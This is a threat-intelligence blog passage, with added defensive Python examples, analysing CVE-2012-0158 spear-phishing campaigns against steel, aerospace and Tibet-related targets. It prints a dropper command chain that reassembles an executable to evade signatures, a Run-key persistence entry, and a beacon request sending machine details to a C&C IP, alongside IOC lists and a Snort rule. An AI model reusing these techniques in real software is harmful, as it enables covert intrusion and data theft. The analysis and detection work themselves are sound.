AlienVault R&D Labs Portal. Get the latest news from our research.

The CVE-2012-0158 vulnerability has been one of the main players in the information security scene during the last few weeks. Since it was first seen in the wild, attackers have been using it to compromise specific targets.

We have been tracking one of these campaigns against one of the main steel industry corporations based in Japan. We will see how the attackers tested the exploit, launched the attack, and then improved it, all within a couple of days.

Since we can’t determine exactly where the attack comes from, we will look at some evidence that could point towards some conclusions.

One of the first samples found in the wild linked to this campaign is a specially crafted Microsoft Office file that uses CVE-2012-0158 to execute a malicious payload and then shows an embedded harmless MS Office file to the victim. All the other documents are very similar, but the payloads and the harmless documents differ each time.

The targets are infected by sending emails to specific key people in the organization.

Some of the harmless documents shown after exploitation are related to industrial products:

In this first sample the dropped payload, named 0412test.exe, is a Microsoft Notepad binary from Windows XP Service Pack 2, Chinese Edition. This suggests that the attackers were running their first tests on their own infrastructure while building the attack.

The next samples include malicious payloads that connect to a Command & Control server managed by the attackers, which is always the same IP. At the moment all the domains found point to 210.175.53.122, an IP address located in Japan.

The second sample found drops a Trojan horse that connects to the C&C while showing another Office document to the victim. This sample has very limited functionality. One interesting fact is its high antivirus detection ratio (23/42).


The main feature of the next sample found is its antivirus detection ratio: on the day of discovery it was less than half that of the previous one (only 11/42). It has since changed a bit.


Finally, we found a sample with many more capabilities than the previous ones. It is more focused on stealing user credentials and retrieving internal information from the affected systems. It reads saved login credentials from the Mozilla Firefox browser and hooks Windows user input to collect information.

It also has two internal IP ranges (192.168.20.1-62, 10.18.104.88-245) hard-coded in the source code.

The antivirus detection ratio has decreased again: on the day of discovery only 6/42 antivirus engines detected the threat. At the time of writing it is detected by five more.


Each sample connects to one of the following domains, all of which, as we previously mentioned, point to the same IP.

touber.lagga.net
nasa.yorli.net

munite.vazuki.com
unbye.sqehom.com
tprovty.igekng.com

ernet.afywis.com
oeoe.yetrap.com
lence.kovmir.com

We will probably see more attacks as part of this campaign, with more advanced payloads. We’ve added the C&C IP address to our IP Reputation Database, and we will monitor these C&C servers to detect new threats coming from them.

The number of samples exploiting CVE-2012-0158 has been growing since we reported some of the first infections last week. We have been detecting several ongoing campaigns against a number of industries. One of the campaigns that attracted our attention is targeting the military and aerospace industry.

Some of the documents sent to the victims still have a low antivirus detection rate. For example, one of the files sent is called “SMD_Conference_2012.doc”.

https://www.virustotal.com/file/b2b2091ed7d211b713353affa7e4e6585ae8abbbc8fc3eede74d0c93f39a7f6b/analysis/

When the victim opens the malicious document, the shellcode drops the malware and a benign Office file, then executes the dropped binary and opens the Office file:

cmd /c echo MZ>log1.txt && cmd /c copy /b log1.txt+fabc.scr abc.scr && cmd /c abc.scr && cmd /c del log1.txt && cmd /c del fabc.scr

cmd /c SMD_Conference2012.doc
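The first command line above is worth a closer look: the shellcode writes the payload to disk without its first bytes and only reassembles a valid executable at run time with `copy /b`, so the fragment `fabc.scr` does not look like a PE file to anything that inspects it on disk. The following Python is an added example (not code from the post or from the malware) that reproduces that reassembly on the analyst's side and checks the result the way a forensic tool would; the minimal PE header it builds is a constructed stand-in, not the real sample, and `cmd`'s `echo` appending CRLF is a property of Windows `cmd.exe`, which is why four bytes, not two, are restored.

```python
import struct


def build_minimal_pe_stub() -> bytes:
    """Constructed stand-in for a PE image (not the post's sample).

    Only the fields the sanity check relies on are populated: the 'MZ'
    magic, e_lfanew at offset 0x3c, and the 'PE\\0\\0' signature it points to.
    """
    header = bytearray(b"MZ")
    header += b"\x90\x00"                   # e_cblp: not used by the loader
    header += b"\x00" * (0x3c - len(header))
    header += struct.pack("<I", 0x40)       # e_lfanew -> NT headers at 0x40
    header += b"PE\x00\x00"                 # NT signature
    header += b"\x00" * 16                  # rest of the (fake) image
    return bytes(header)


def as_written_by_shellcode(pe: bytes) -> bytes:
    """What lands on disk as fabc.scr: the image minus its first four bytes.

    'echo MZ>log1.txt' produces 'MZ\\r\\n' (cmd appends CRLF), so the dropper
    stores the PE with those four leading bytes removed and relies on
    'copy /b' to put them back. Bytes 2-3 of a DOS header are ignored by
    the Windows loader, so the CRLF does no harm.
    """
    return pe[4:]


def reassemble(fabc: bytes) -> bytes:
    """Analyst-side equivalent of 'copy /b log1.txt+fabc.scr abc.scr'."""
    return b"MZ\r\n" + fabc


def is_pe(data: bytes) -> bool:
    """Minimal PE sanity check: MZ magic and an e_lfanew pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3c)
    if e_lfanew <= 0 or e_lfanew > len(data) - 4:
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


if __name__ == "__main__":
    original = build_minimal_pe_stub()
    on_disk = as_written_by_shellcode(original)
    print("fabc.scr looks like a PE:", is_pe(on_disk))            # False
    print("abc.scr looks like a PE:", is_pe(reassemble(on_disk)))  # True
```

The defender's lesson is that a file-based signature on the dropped fragment will miss it; the more reliable artifacts are the command chain itself (`echo MZ>`, `copy /b ... +...`, followed by execution and deletion of the pieces), which is what to look for in process-creation or command-line logging.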

So the victim will see the following document:


The binary created by the shellcode is a dropper that contains the actual malware embedded in a resource. After deciphering the content, it creates the new binary under \Documents and Settings\{UserName}\Local Settings\Application Data\GoogleUpdate.exe and creates the following registry entry in order to maintain persistence:

\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

GoogleUpd  SZ  "C:\Documents and Settings\Joe Maldive\Local Settings\Application Data\GoogleUpdate.exe"

The payload is detected as BKDR_FYNLOS.SM1 and has been used in other similar attacks in the past. The malware connects to the C&C server at 204.13.66.119.

The following HTTP request is sent to the C&C server:

GET /search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)
Host: 204.13.66.119
Connection: Keep-Alive

The values sent are the operating system version (5.1 = Windows XP), the encoded serial number of the machine and the encoded machine name.

It seems to be a version of the trojan called MSUpdater that was described by Zscaler a few months ago. Once again the group behind these attacks is using conference-related subjects as a lure to target these industries.

You can use the following Snort rule, already present in Emerging Threats, to detect the C&C traffic:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Win32/Cryptrun.B/MSUpdater C&C traffic 1"; flow:from_client,established; content:"/search"; http_uri; content:"?h1="; fast_pattern; http_uri; content:"&h2="; distance:0; http_uri; content:"&h3="; distance:0; http_uri; content:"User-Agent|3a| Mozilla/5.0 (compatible|3B|"; http_header; reference:url,blog.9bplus.com/kim-jong-il-pdf-malware; reference:url,www.seculert.com/reports/MSUpdaterTrojanWhitepaper.pdf; reference:url,research.zscaler.com/2012/01/msupdater-trojan-and-link-to-targeted.html; reference:url,blog.seculert.com/2012/01/msupdater-trojan-and-conference-invite.html; classtype:trojan-activity; sid:2014174; rev:4;)
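For readers who want to test the rule's logic outside Snort, or apply it to captured HTTP requests in a proxy log, the following Python is an added example (not part of the post and not Emerging Threats code) that re-implements the rule's content checks: `/search` in the URI, then `?h1=`, `&h2=` and `&h3=` in that order (Snort's `distance:0` means "anywhere after the previous match"), and `Mozilla/5.0 (compatible;` in the User-Agent header. The first sample request reproduces the beacon shown above; the other two are constructed look-alikes that should not match.

```python
import re

# Constructed sample requests. The first reproduces the beacon from the post;
# the second has the parameter names but a normal browser User-Agent; the
# third has the right User-Agent prefix but the wrong parameter order.
SAMPLE_REQUESTS = [
    "GET /search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)\r\n"
    "Host: 204.13.66.119\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /search?h1=a&h2=b&h3=c HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) Firefox/12.0\r\n"
    "Host: example.com\r\n\r\n",
    "GET /search1?h1=1&h3=2&h2=3 HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0)\r\n"
    "Host: example.org\r\n\r\n",
]


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, uri, headers) with lower-cased header names."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, uri, headers


def matches_msupdater_rule(raw: str) -> bool:
    """Python rendering of the content checks in ET sid 2014174."""
    _method, uri, headers = parse_request(raw)
    if "/search" not in uri:
        return False
    pos = uri.find("?h1=")
    if pos < 0:
        return False
    pos = uri.find("&h2=", pos)          # distance:0 -> after the previous match
    if pos < 0:
        return False
    if uri.find("&h3=", pos) < 0:
        return False
    # The rule's http_header content is a substring match on the raw header,
    # so an 'in' test mirrors it (and shares its false-positive surface).
    return "Mozilla/5.0 (compatible;" in headers.get("user-agent", "")


def beacon_fields(raw: str) -> dict:
    """Pull the h1..h4 parameters out of a beacon URI for triage."""
    _m, uri, _h = parse_request(raw)
    query = uri.partition("?")[2]
    return dict(re.findall(r"(?:^|&)(h[1-4])=([^&]*)", query))


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        verdict = "MATCH" if matches_msupdater_rule(req) else "no match"
        print(verdict, req.split("\r\n", 1)[0])
    print(beacon_fields(SAMPLE_REQUESTS[0]))
```

Because the User-Agent check is a substring test, a legitimate client advertising `Mozilla/5.0 (compatible; MSIE 8.0)` that also happens to request `/search?h1=...&h2=...&h3=...` would trip the rule; in practice the `h1`/`h2`/`h3` ordering and the encoded-letter values in `h4` and in the User-Agent are what make the beacon stand out when reviewing hits.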


jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.


CVE-2012-0158, Tibet, Targeted Attacks and so on

April 18th, 2012 | Posted by jaime.blasco in APT | Attacks | Malware

As our friends at TrendMicro reported a couple of days ago, CVE-2012-0158 is being actively used in different spearphishing campaigns, mainly against NGOs and Tibet-related organizations.

The vulnerability used was patched by Microsoft a week ago:

The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers “system state” corruption, as exploited in the wild in April 2012, aka “MSCOMCTL.OCX RCE Vulnerability.”

We have found several targeted RTF files dropping different trojans and RATs onto the victims. One of the malicious files is very similar to what TrendMicro described a couple of days ago, but it shows how quickly the attackers adapt their code to what security companies release in order to avoid signature and AV detection.

Once you open the RTF document, it drops the malicious executable as well as a benign doc file:

Immolation Statement.doc


The dropped exe file has a low AV detection rate:

https://www.virustotal.com/file/b7c6522ce21bd230c33e3f250d9789395af932e7fc72c9e0c1304c0bbcaa5e61/analysis/1334789684/

https://www.virustotal.com/file/eb6901caaf90e7e04b5c79d33aaa4aa3f3139cfb179418f78555e0c724b9e09f/analysis/1334790589/

More interestingly, it is digitally signed, apparently by the same signer described by TrendMicro, but this time the certificate is valid and the file was signed on the 16th.


The trojan connects to the following domains:

  • 1.test.3322.org.cn -> 64.62.224.75
  • 2.test.3322.org.cn -> 74.82.63.102
  • 3.test.3322.org.cn -> 74.82.63.102
  • 4.test.3322.org.cn -> 64.62.224.75
  • 123ewqasdcxz.xicp.net, now pointing to 0.0.0.0
  • hoop-america.oicp.net -> 222.132.195.5
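The domains and IPs listed in this post and in the steel-industry post above are the kind of indicators that go straight into a DNS or proxy log review. The following Python is an added example (not code from the posts) that gathers them and scans constructed DNS log lines for three kinds of hit: an exact indicator domain, any label under `test.3322.org.cn` (the posts list `1.` to `4.test.3322.org.cn`; treating the whole subtree as suspicious is this example's own generalisation), and a resolved answer equal to a known C&C IP even when the queried name is unknown. `0.0.0.0` is deliberately not an indicator, since it is the parked answer for `123ewqasdcxz.xicp.net`, not a server. The log format (`timestamp client query name type answer`) is constructed for the example; the client addresses are drawn from the internal ranges hard-coded in the third steel-industry sample.

```python
from dataclasses import dataclass
from typing import List, Optional

# Indicators taken from the two posts.
IOC_DOMAINS = {
    "touber.lagga.net", "nasa.yorli.net", "munite.vazuki.com", "unbye.sqehom.com",
    "tprovty.igekng.com", "ernet.afywis.com", "oeoe.yetrap.com", "lence.kovmir.com",
    "123ewqasdcxz.xicp.net", "hoop-america.oicp.net",
}
# Parent-domain indicator: flag any name under it (this example's assumption).
IOC_PARENT_DOMAINS = {"test.3322.org.cn"}
# C&C addresses from the posts; 0.0.0.0 is intentionally excluded.
IOC_IPS = {"210.175.53.122", "204.13.66.119", "64.62.224.75", "74.82.63.102", "222.132.195.5"}

# Constructed DNS log lines: "timestamp client query <name> <type> <answer>".
SAMPLE_DNS_LOG = [
    "2012-04-18T09:12:03Z 192.168.20.15 query touber.lagga.net A 210.175.53.122",
    "2012-04-18T09:12:05Z 192.168.20.15 query www.example.com A 93.184.216.34",
    "2012-04-18T09:13:41Z 10.18.104.90 query 5.test.3322.org.cn A 64.62.224.75",
    "2012-04-18T09:14:02Z 10.18.104.90 query cdn.example.net A 204.13.66.119",
    "2012-04-18T09:15:00Z 192.168.20.40 query 123ewqasdcxz.xicp.net A 0.0.0.0",
]


@dataclass
class Hit:
    line_no: int
    client: str
    name: str
    reason: str


def normalise(name: str) -> str:
    """Lower-case and drop a trailing dot so 'NASA.yorli.net.' matches the list."""
    return name.lower().rstrip(".")


def domain_hit(name: str) -> Optional[str]:
    """Return 'domain' for an exact indicator, 'parent-domain' for a name under one, else None."""
    name = normalise(name)
    if name in IOC_DOMAINS:
        return "domain"
    labels = name.split(".")
    for i in range(1, len(labels)):
        if ".".join(labels[i:]) in IOC_PARENT_DOMAINS:
            return "parent-domain"
    return None


def scan_dns_log(lines: List[str]) -> List[Hit]:
    """Scan log lines and report which queries touch the campaign indicators."""
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 6 or parts[2] != "query":
            continue                      # skip lines that are not queries
        _ts, client, _verb, name, _rtype, answer = parts[:6]
        reason = domain_hit(name)
        if reason is None and answer in IOC_IPS:
            reason = "resolved-ip"        # unknown name, known C&C address
        if reason:
            hits.append(Hit(n, client, normalise(name), reason))
    return hits


if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"line {hit.line_no}: {hit.client} -> {hit.name} [{hit.reason}]")
```

The resolved-IP check matters for campaigns like this one, where every domain in the first post already pointed at a single address: the attackers can register new names faster than lists are updated, but the server behind them changes less often.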

We have collected several documents/mails exploiting CVE-2012-0158 and will publish more information about the ongoing campaigns. Stay tuned!
